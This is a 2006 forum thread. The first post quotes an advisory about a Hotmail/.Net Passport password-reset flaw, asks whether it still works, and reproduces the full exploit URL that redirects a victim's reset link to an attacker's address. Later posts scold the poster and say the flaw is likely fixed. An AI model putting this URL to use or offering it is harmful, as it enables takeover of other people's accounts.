 Password Reset Vulnerability |
|
|
|
|
  |
  Apr 22 2006, 10:19 AM
Post
#1
|
|
|
Newbie [ Level 1 ]  Group: Members Posts: 7 Joined: 22-April 06 Member No.: 12,929  |
is it working now...?
QUOTE An attacker can reset any Microsoft Hotmail/.Net Passport user account
with no prior information like state, zip, country, answer to the secret question and the old password. Normally, a user has to answer the security questions and than answer the secret question if he wants to reset his password. By exploiting this vulnerability, an attacker can submit a specially crafted URL to get the password reset instructions and reset any user?s password. TECHNICAL DETAILS Due to the nature of this vulnerability and the fact that there is no fix available yet, no technical details are being made available with this advisory. Full technical details will be made available on our website once the vulnerability is fixed by Microsoft. Please note that we were forced to release this information public as these vulnerabilities are actively being exploited in the wild and are one of the most severe vulnerabilities ever found in Microsoft Hotmail/.Net Passport. The flaw is exploited by opening the following URL in a web browser: https://register.passport.net/emailpwdreset.srf?lc=1033 &em=victim@hotmail.com&id=&cb=&prefem=where-to@send-the-email.com&rst= after that, URL which resets the password will be delivered, in this case, to where-to@send-the-email.com. This post has been edited by me-here: Apr 22 2006, 10:27 AM |
 |
 
|
|
Apr 22 2006, 01:15 PM
Post
#2
|
|
|
PsYcheDeLiC dR3aMeR  Group: Admin Posts: 2,242 Joined: 29-January 05 From: Nakorn Chaisri, Thailand Member No.: 2,411 myCENTs:84.36 |
For Gods sake, try and provide SOME ORIGINAL INPUT ON YOUR OWN PART. I'm getting tired of warning you and deleting such posts. Don't you have any goddamned opinion on anything on your own? Or do you simply specialize is posting quoted material from other sites?
|
|
|
|
|
Apr 22 2006, 10:49 PM
Post
#3
|
|
|
Advanced Member Group: Members Posts: 189 Joined: 15-November 05 From: Inland from the Left Coast of Canada Member No.: 9,627 myCENTs:62.43 |
O.o, never seen M^E this mad before. Musta really got under his skin...
|
|
|
|
|
Apr 24 2006, 05:51 AM
Post
#4
|
|
|
Geek in-training Group: Members Posts: 301 Joined: 2-July 05 From: Washington State, USA, 3rd Rock from the Star Sol Member No.: 6,772 |
yes the ability to reset a password on the hotmail/msn network is possible, much like the quoted material you posted states. They are currently are working on, or have fixed, that problem already. As for how to do it, thats above my knowledge level, or to be more precise, not what I like to do for fun on my evenings off.
As for the post...I have to agree with M^E, of the couple of posts of yours that I have run across they are, umm...Juvenile at best, or in my opinion just this side of spam. Please feel free to contribute to the community, I would love to see you become a strong member here, but please don't post like this anymore, otherwise M^E, Moonwitch, or another of the mods might decide that banning might be the best option. |
|
|
|
 |
Similar Topics
|
Lo-Fi Version | Time is now: 22nd November 2008 - 02:17 PM |